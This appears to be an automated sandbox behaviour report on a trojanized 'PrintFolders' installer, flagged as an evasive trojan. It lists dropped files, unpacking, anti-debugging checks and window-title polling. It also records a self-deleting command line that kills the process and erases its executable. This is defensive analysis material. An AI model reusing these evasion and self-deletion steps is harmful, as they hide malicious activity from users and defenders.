Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00403548 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00407B08 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00445FF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00455A04 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00405AA4 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00455814 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 004462C4 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 004348AC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00451AFC appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: String function: 00408DF0 appears 42 times

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00423D9C NtdllDefWindowProc_A,	1_2_00423D9C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004127F0 NtdllDefWindowProc_A,	1_2_004127F0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_004551C4

Source: is-QPTG8.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-QPTG8.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-QPTG8.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-48N1K.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-48N1K.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-48N1K.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-2632S.tmp.1.dr

Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilename" vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62

Source: PrintFolders.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe"	Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe	Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70,		0_2_00408F74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70,		1_2_00453A8C

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "PrintFolders.exe")

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winEXE@12/23@0/5

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

2_2_00401B30

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Code function: 1_2_00454498 GetModuleHandleA,6D2B5550,GetDiskFreeSpaceA,

1_2_00454498

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402BF0

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

2_2_00405350

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Code function: 1_2_0040B1E0 FindResourceA,FreeResource,

1_2_0040B1E0

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

File created: C:\Program Files (x86)\PrintFolders

Jump to behavior

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Command line argument: `a}{	2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Command line argument: MFE.	2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Command line argument: ZK]Z	2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Command line argument: ZK]Z	2_2_004096F0

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1488975 > 1048576

Source:

Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.rgw89:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406584 push 004065C1h; ret	0_2_004065B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404159 push eax; ret	0_2_00404195
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404229 push 00404435h; ret	0_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax	0_2_00407E89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042AA push 00404435h; ret	0_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408B24 push 00408B57h; ret	0_2_00408B4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404327 push 00404435h; ret	0_2_0040442D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040438C push 00404435h; ret	0_2_0040442D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00409B70 push 00409BADh; ret	1_2_00409BA5
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040A257 push ds; ret	1_2_0040A258
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00478210 push 004782BBh; ret	1_2_004782B3
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040A22B push ds; ret	1_2_0040A255
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax	1_2_004063C9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax	1_2_004303A9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax	1_2_0045A751
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx	1_2_004108ED
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00412B40 push 00412BA3h; ret	1_2_00412B9B
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00450FF8 push 0045102Bh; ret	1_2_00451023
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx	1_2_0040D242
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004055BD push eax; ret	1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx	1_2_00443664
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040568D push 00405899h; ret	1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx	1_2_0047976D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040570E push 00405899h; ret	1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004057F0 push 00405899h; ret	1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040578B push 00405899h; ret	1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx	1_2_0040F7A2
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx	1_2_00419E45
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004311AD push esi; ret	2_2_004311B6
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0040F4BB push ecx; ret	2_2_0040F4CE

Source: PrintFolders.exe.1.dr

Static PE information: section name: .rgw89

Source: initial sample

Static PE information: section name: .text entropy: 7.272434889037595

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Program Files (x86)\PrintFolders\is-2632S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp	Jump to dropped file
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_iscrypt.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423E24
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423E24
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus,	1_2_004243F4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004243AC IsIconic,SetActiveWindow,	1_2_004243AC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_0041859C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_00422A74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004177B0 IsIconic,GetCapture,	1_2_004177B0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_00477D2C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00417EE6 IsIconic,SetWindowPos,	1_2_00417EE6
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417EE8

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-5527

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-2632S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll	Jump to dropped file

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_2-35021

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

2_2_004056A0

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_004095D0

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,	1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00451554 FindFirstFileA,GetLastError,	1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose,	1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,	1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00423E2D FindFirstFileExW,	2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_1000959D FindFirstFileExW,	2_2_1000959D

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Jump to behavior

Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp, PrintFolders.exe, 00000002.00000002.326024526.000000000179B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_0041336B

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402BF0

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

2_2_00402F20

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]	2_2_0044028F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]	2_2_0042041F
